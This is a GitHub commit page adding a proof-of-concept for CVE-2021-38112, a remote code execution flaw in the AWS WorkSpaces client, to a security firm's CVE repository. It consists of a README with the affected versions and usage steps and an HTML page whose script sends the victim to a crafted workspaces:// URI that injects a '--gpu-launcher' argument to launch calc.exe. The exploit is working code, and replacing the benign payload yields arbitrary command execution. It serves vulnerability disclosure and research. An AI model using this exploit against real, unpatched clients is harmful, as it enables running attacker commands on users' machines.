forked from RhinoSecurityLabs/CVEs
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request RhinoSecurityLabs#6 from DaveYesland/add_CVE-2021-…
…38112 Add CVE 2021 38112
- Loading branch information
Showing
4 changed files
with
40 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| <!-- | ||
| This is an example POC for CVE-2021-38112: AWS WorkSpaces Remote Code Execution | ||
| More info: https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/ | ||
| --> | ||
| <!DOCTYPE html> | ||
| <html> | ||
| <script> | ||
| function launch(){ | ||
| reg_code = document.getElementById("reg_code").value; | ||
| document.location = "workspaces://anything%20--gpu-launcher=%22calc.exe%22@"+reg_code; | ||
| } | ||
| </script> | ||
| <body> | ||
| <p> | ||
| WorkSpaces Registration Code: <input id="reg_code"> | ||
| </p> | ||
| <p> | ||
| <button type="button" onclick="launch()">Launch WorkSpaces</button> | ||
| </p> | ||
| </body> | ||
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| # CVE-2021-38112: AWS WorkSpaces Remote Code Execution | ||
|
|
||
| ## Information | ||
| **Description:** This vulnerability allows arbitrary commands to be executed when opening a crafted URI in Amazon AWS WorkSpaces client. | ||
| **Versions Affected:** < 3.1.9 | ||
| **Researcher:** David Yesland @daveysec (https://twitter.com/daveysec) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2021-38112 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| When a user opens the HTML page with the attackers valid WorkSpace registration code, they are redirected to the crafted URI which will launch calc.exe upon the WorkSpaces client opening. | ||
|
|
||
| ### Usage/Exploitation | ||
| Create a valid WorkSpaces registration code in AWS AD and open the HTML file. Enter to code and click the button. | ||
|
|
||
| ### Screenshot | ||
|  |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters